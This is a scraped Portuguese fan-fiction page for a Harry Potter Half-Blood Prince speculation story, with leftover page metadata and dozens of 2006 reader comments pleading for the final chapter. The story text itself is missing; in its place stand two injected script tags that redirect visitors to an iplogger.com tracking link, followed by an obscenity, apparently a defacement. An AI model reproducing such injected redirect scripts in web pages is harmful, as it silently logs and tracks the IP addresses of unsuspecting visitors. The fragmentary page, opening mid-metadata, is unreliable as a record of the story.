","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>

Foda-se


Compartilhe!

anúncio

Comentários (2867)

  • Parabens sua fic eh uma das poucas que li ultimamente que nos apssa a impressao de tudo o que esta acontecendo e naturalmente da mesma forma q a nossa kerida J.K faz !!!! Concerteza uma das Melhores se nao A melhor que jah li !! e eh claro !! POSTA O ULTIMO CAPITULO POR FAVORRR !!!!!

    2006-05-18
  • Pelas barbas de merlin atualiza logo.isso é um apelo desesperado

    2006-05-18
  • amei sua fic... eh simplesmente d+... pow.. cm assim "o proximo capitulo serah o ultimo"?¬¬ sua fic eh otima... q tal fazer otra dps dessa? bjuuuusssss... parabens pela fic

    2006-05-17
  • por favooor, não demore para atualizar sônia!

    2006-05-17
  • otima a sua fic, nao demora pra postar nao , pelo amor de deus sdhuihsuiahduiahsd :~ beijo *:

    2006-05-17
  • Atualiza, por favor! Eu nem tô conseguindo escrever o próximo capítulo da minha fic de tanta ansiedade. Mas, tudo vai dar certo, poruqe na verdade esse capítulo do qual eu tô falando já tá nomeio. Mas, então, como vai O CAPÍTULO? Posta logo. Eu vou cair morto de tanta ansiedade! Posta Logo. Atualiza. POR FAVOR. Posta Logo! BEIJOS!!! VC É D+!!!!!!!!!!!!! E A FIC TAMBÉM!!!!!!!!!!!!!!!!!!!

    2006-05-17
  • Um beijinho e um votinho!!!!! ps: ainda estou viva =)

    2006-05-16
  • muito boa a fic, muito mesmo...comecei a ler a um mes atras, ja li todos os capitulos e to esperando o proximo...mas atualiza LOGO! nao aguento mais espera pra ler o final. nota: 5

    2006-05-16
  • oie..nu sei se a melhor nota a se deixar eh u cinco ou um...vou deixar o um d primeiro...pq sua fic eh demais...boa pra caramba...nussa cada emoção senti lendo a fic...realmente meus parábens...suas teorias fazem sentido e tah muito massa...sei q devem t cobrarem o tempo todo para atualizar a fic ...mas eh q ela eh demais e com certeza vc ganho mais uma nova fã....bjinhus

    2006-05-16
  • Sei que vc esta fzendo de tudo para esse ser realmente "O CAPITULO"..mas, estamos ansiosos!!!!! eu nao aguente..cada dia eu do uma passada aquio pra ve se vc atualizou!! pelo o q eu ja li, por essa "demora", deve esta ficando perfeito o cap!! dê o maximo q puder para compensar nossa ansiosidade!!! MELHOR FIC DO MUNDO!!!!!

    2006-05-16
Você precisa estar logado para comentar. Faça Login.